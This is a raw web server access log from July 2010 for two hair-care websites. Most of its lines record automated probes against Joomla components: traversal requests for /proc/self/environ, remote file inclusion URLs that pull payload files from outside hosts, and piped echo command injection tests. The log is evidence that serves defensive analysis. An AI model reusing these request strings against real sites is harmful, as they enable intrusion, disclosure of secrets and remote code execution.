208.115.111.248 - - [12/Jul/2010:04:56:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8734 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8757 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9351 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9817 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9876 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9887 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
77.222.34.35 - - [12/Jul/2010:04:57:04 -0700] "GET /index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:04:59:26 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:02:49 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:03:11 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:03:11 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:03:12 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:03:12 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:03:16 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:03:16 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
174.121.64.231 - - [12/Jul/2010:05:03:16 -0700] "GET /logs//index.php?option=com_content&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [12/Jul/2010:05:03:17 -0700] "GET /index.php?option=com_content&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:04:28 -0700] "GET /logs/access_100705.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:04:28 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:04:28 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:04:29 -0700] "GET /logs/access_100705.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:04:29 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:04:29 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:05:31 -0700] "GET /logs/access_100628.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:05:32 -0700] "GET /logs/access_100628.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
94.23.215.207 - - [12/Jul/2010:05:09:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.215.207 - - [12/Jul/2010:05:10:03 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:05:10:07 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
222.122.52.79 - - [12/Jul/2010:05:11:11 -0700] "GET /logs/access_100628.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.79 - - [12/Jul/2010:05:11:11 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.79 - - [12/Jul/2010:05:11:12 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
65.254.36.102 - - [12/Jul/2010:05:11:21 -0700] "GET /logs/access.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:05:11:23 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:05:11:23 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:11:25 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:11:32 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:11:33 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:23 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:23 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:23 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:24 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:24 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:24 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:30 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:30 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
217.195.185.200 - - [12/Jul/2010:05:13:30 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
218.145.71.241 - - [12/Jul/2010:05:16:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [12/Jul/2010:05:17:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.80.193.39 - - [12/Jul/2010:05:17:46 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; Media Center PC 3.0; .NET CLR 1.0.3705; HbTools 4.8.0; yplus 5.1.04b)" "freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:18:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:05:18:14 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:18:27 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:18:27 -0700] "GET /logs/access_100614.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:18:27 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:18:27 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:18:28 -0700] "GET /logs/access_100614.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:18:28 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
94.23.38.229 - - [12/Jul/2010:05:19:18 -0700] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
222.122.52.79 - - [12/Jul/2010:05:19:58 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.52.79 - - [12/Jul/2010:05:19:58 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.52.79 - - [12/Jul/2010:05:19:58 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:15 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:15 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:15 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:15 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:15 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:15 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.121.64.231 - - [12/Jul/2010:05:22:23 -0700] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:45 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:45 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:05:22:45 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
94.23.215.207 - - [12/Jul/2010:05:25:25 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.215.207 - - [12/Jul/2010:05:25:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.215.207 - - [12/Jul/2010:05:25:26 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:05:26:58 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "growlonghairfast.com"
208.101.2.242 - - [12/Jul/2010:05:32:21 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:32:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:32:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
79.244.82.199 - - [12/Jul/2010:05:33:02 -0700] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:05:33:02 -0700] "GET /logs/access_100607.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:05:33:02 -0700] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:05:33:29 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:33:30 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:33:30 -0700] "GET /logs/access_100614.log/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:33:30 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:33:30 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:05:33:30 -0700] "GET /logs/access_100614.log/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
79.244.82.199 - - [12/Jul/2010:05:33:31 -0700] "GET /logs/access_100125.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.101.2.242 - - [12/Jul/2010:05:35:11 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_rokdownloads&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:35:11 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_rokdownloads&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:35:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_rokdownloads&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:05:42:03 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "growlonghairfast.com"
77.222.34.35 - - [12/Jul/2010:05:43:06 -0700] "GET /logs/access.log//index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [12/Jul/2010:05:43:07 -0700] "GET /index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [12/Jul/2010:05:43:08 -0700] "GET /logs//index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
94.23.215.207 - - [12/Jul/2010:05:49:54 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.215.207 - - [12/Jul/2010:05:49:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.215.207 - - [12/Jul/2010:05:49:54 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:05:55:32 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:05:55:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:05:55:33 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:55:42 -0700] "GET /logs/access.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:05:55:42 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
